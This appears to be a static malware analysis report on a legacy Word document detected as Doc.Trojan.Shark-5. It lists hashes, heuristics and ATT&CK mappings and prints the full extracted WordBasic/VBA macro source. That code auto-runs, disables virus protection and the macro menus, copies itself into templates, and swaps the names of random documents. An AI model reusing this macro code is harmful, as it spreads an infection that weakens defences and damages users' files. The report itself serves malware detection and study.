Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6b4f89543f6e07a5…

MALICIOUS

Office (OLE)

53.0 KB Created: 1997-04-26 07:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a558a5bc2163852115c7243d89ebc60d SHA-1: 0655bcf2fb24f0f23fb67aaf2bae92e9a69e1d2c SHA-256: 6b4f89543f6e07a57e7aa6e3ab05d63f9956e1dcede27ffcb587aadb081ddb0d
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This OLE document contains legacy WordBasic macros, including AutoOpen, AutoClose, and AutoExec, which are indicative of older malware families. The script explicitly attempts to disable virus protection and copy itself to other documents, suggesting a self-propagating or infection mechanism. The ClamAV detection 'Doc.Trojan.Shark-5' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Shark-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Shark-5
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 54,272 bytes but its declared streams total only 30,798 bytes — 23,474 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3538 bytes
SHA-256: 7eb17cf49c9f57801cb73255202a09bbedfc020b9ba1422d33e1766969071937
Detection
ClamAV: Doc.Trojan.Shark-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Switch"
'                  >>> Switch - An Israeli Virus <<<
'                             Written by
'                        " The Israeli Shark "
'                         All Rights Reserved
'                               1999(C)

Public TemplateName As String
Public DocName As String

Sub AutoOpen()
    Call First
End Sub

Sub AutoNew()
  Call First
End Sub

Sub AutoClose()
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.MainModule.AutoClose"
   Call First
End Sub

Sub AutoExec()
  Call First
End Sub

Sub AutoExit()
    Call First
End Sub

Sub FileSave()
On Error GoTo NextStep
    Documents.Application.ActiveDocument.Save
NextStep:
    Call First
End Sub


Private Sub First()
   
    On Error GoTo NextStep
    
    'Removes Any Detection Options
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    CommandBars.Item("macro").Enabled = False
    CommandBars.Item("Visual Basic").Enabled = False
   
    Dim varTemplate As Template
   
    DocName = Application.ActiveDocument.FullName
  
    For Each varTemplate In Templates
        TemplateName = varTemplate.FullName
        Application.OrganizerCopy DocName, TemplateName, "Switch", wdOrganizerObjectProjectItems
        varTemplate.Save
    Next varTemplate
       
NextStep:

    Call Second

End Sub
Private Sub Second()
     
    On Error GoTo NextStep
    
     Application.OrganizerCopy TemplateName, DocName, "Switch", wdOrganizerObjectProjectItems
     
NextStep:
  
    Call Third

End Sub

Private Sub Third()
   
    On Error GoTo EndOfProcess
    
    Dim PathString As String
    Dim strFileName(1 To 2) As String
    Dim TempFileName As String
    Dim FilesNum As Integer
    Dim Index As Integer
    Dim Index2 As Integer
    Dim Temp As Integer
     
    PathString = Dir("C:\Protect.sys"): If Len(PathString) Then End
       
    PathString = ActiveDocument.Path
        
    If Right(PathString, 1) <> "\" Then PathString = PathString + "\"
    
    strFileName(1) = Dir(PathString + "Switch.doc")
    If Len(strFileName(1)) Then
        Kill "Switch.doc"
    End If
    
    strFileName(1) = Dir(PathString + "*.DOC")
    
    Do While Len(strFileName(1))
        FilesNum = FilesNum + 1
        strFileName(1) = Dir
    Loop
     
    FilesNum = FilesNum - 1
    strFileName(1) = ""
    strFileName(2) = ""
     
    strFileName(1) = Dir(PathString + "*.Doc")
    
    For Index = 1 To 2
        Randomize (Timer)
        Temp = Int(Rnd(1) * (FilesNum - 1)) + 1
        For Index2 = 1 To Temp
            strFileName(Index) = Dir
        Next Index2
        FilesNum = FilesNum - (Temp - 1)
    Next Index
    
    Open PathString + strFileName(1) For Binary Access Read Lock Read As #1: Input #1, TempLine: Close #1
    Open PathString + strFileName(2) For Binary Access Read Lock Read As #1: Input #1, TempLine: Close #1
    
    Name PathString + strFileName(1) As PathString + "Switch.doc"
    Name PathString + strFileName(2) As PathString + strFileName(1)
    Name PathString + "Switch.doc" As PathString + strFileName(2)

    End

EndOfProcess:

    End

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.